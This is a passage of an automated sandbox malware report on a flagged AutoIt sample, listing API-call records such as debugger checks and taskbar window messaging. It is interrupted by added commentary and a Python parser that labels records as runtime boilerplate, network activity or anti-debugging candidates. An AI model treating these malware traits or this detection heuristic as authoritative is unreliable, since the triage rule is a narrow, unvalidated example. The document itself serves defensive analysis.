                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 6e3bc9a06f1490edc3266605d9b03c39f223db690ac5b1855f3accfa9d92d60a
                    • Instruction ID: c371e23d9fd8f2faefc858c0e06646e575cce4450d35a536a75e850f26264fbe
                    • Opcode Fuzzy Hash: 6e3bc9a06f1490edc3266605d9b03c39f223db690ac5b1855f3accfa9d92d60a
                    • Instruction Fuzzy Hash: 2BE039B06003118BD720EF28E8083427BE4AB04755F04C92DE886C26A1E7BCE408CBA1
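The IsDebuggerPresent/OutputDebugStringW pair in the record above, together with the string "ERROR : Unable to initialize critical section in CAtlBaseModule", is the start-up code of ATL's CAtlBaseModule constructor, which the AutoIt interpreter stub links in; the debugger check only decides whether that error text is written to the debug output, so the record is runtime boilerplate rather than an evasion chosen by the script author. The following Python is an added example, not part of the Joe Sandbox report or of AutoIt: it parses records in the APIs / Strings / Similarity layout used on this page and tags that known-benign pattern separately from records that touch WinINet or Winsock. The record text in SAMPLE is constructed from the layout above (trimmed to the fields that are read), and the function names and verdict labels are the example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: two function records in the Joe Sandbox
# "APIs / Strings / Similarity" layout, trimmed to the fields read here.
SAMPLE = """\
APIs
  • Part of subcall function 00770B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00770B89
• IsDebuggerPresent.KERNEL32(?,?,?,0075100A), ref: 0078B544
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?), ref: 0078B553
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0078B54E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C2520
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C2549
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<name>\w+)\.(?P<mod>\w+)")
STRING_ID_RE = re.compile(r"•\s*String ID:\s*(?P<sid>.*)")
XREF_RE = re.compile(r",\s*xrefs:.*$")

# Text ATL emits from CAtlBaseModule::CAtlBaseModule when its critical section
# cannot be initialised; the IsDebuggerPresent call only gates this message.
ATL_CS_ERROR = "ERROR : Unable to initialize critical section in CAtlBaseModule"
NETWORK_MODULES = {"WININET", "WSOCK32", "WS2_32", "WINHTTP"}


@dataclass
class ApiCall:
    name: str
    module: str
    subcall: bool  # True for "Part of subcall function" lines


@dataclass
class Record:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    string_id: Optional[str] = None


def parse_records(text: str) -> List[Record]:
    """Split report text into records; every "APIs" header opens a new one."""
    records: List[Record] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":
                records.append(Record())
            continue
        if not records or not line.startswith("•"):
            continue
        rec = records[-1]
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                rec.apis.append(ApiCall(m["name"], m["mod"], m["sub"] is not None))
        elif section == "Strings":
            rec.strings.append(XREF_RE.sub("", line.lstrip("• ")).strip())
        elif section == "Similarity":
            m = STRING_ID_RE.match(line)
            if m:
                rec.string_id = m["sid"].strip()
    return records


def classify(rec: Record) -> str:
    """Verdict label for triage; only direct calls count, subcalls are context."""
    direct = {a.name for a in rec.apis if not a.subcall}
    if {"IsDebuggerPresent", "OutputDebugStringW"} <= direct and rec.string_id == ATL_CS_ERROR:
        # Standard ATL module start-up compiled into the interpreter stub,
        # not an anti-debugging step added by the script author.
        return "atl-runtime-boilerplate"
    if any(a.module in NETWORK_MODULES for a in rec.apis):
        return "network"
    if direct & {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "OutputDebugStringW"}:
        return "anti-debug-candidate"
    return "other"


def triage(text: str) -> List[tuple]:
    return [(rec.string_id, classify(rec)) for rec in parse_records(text)]


if __name__ == "__main__":
    for sid, verdict in triage(SAMPLE):
        print(f"{verdict:24} {sid}")
```

Run against the full report text, the same parser separates the ATL record from genuine debugger checks, so an IsDebuggerPresent hit elsewhere in the listing still surfaces as "anti-debug-candidate" while this one does not inflate the evasion count.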
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D5BF5
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D5C08
                      • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 091ea8cd9d51376169fc494ea4bc736856468463f69c29c44f728a56f031bf9f
                    • Instruction ID: a5e2a6f959efa799113e5c0697b287dd69f0f39e0319f28d92de14159d704a66
                    • Opcode Fuzzy Hash: 091ea8cd9d51376169fc494ea4bc736856468463f69c29c44f728a56f031bf9f
                    • Instruction Fuzzy Hash: 95D0C935389311B6E768AB70AC0FFD76B24AB00B51F044826F657AA1D0D9E89801C654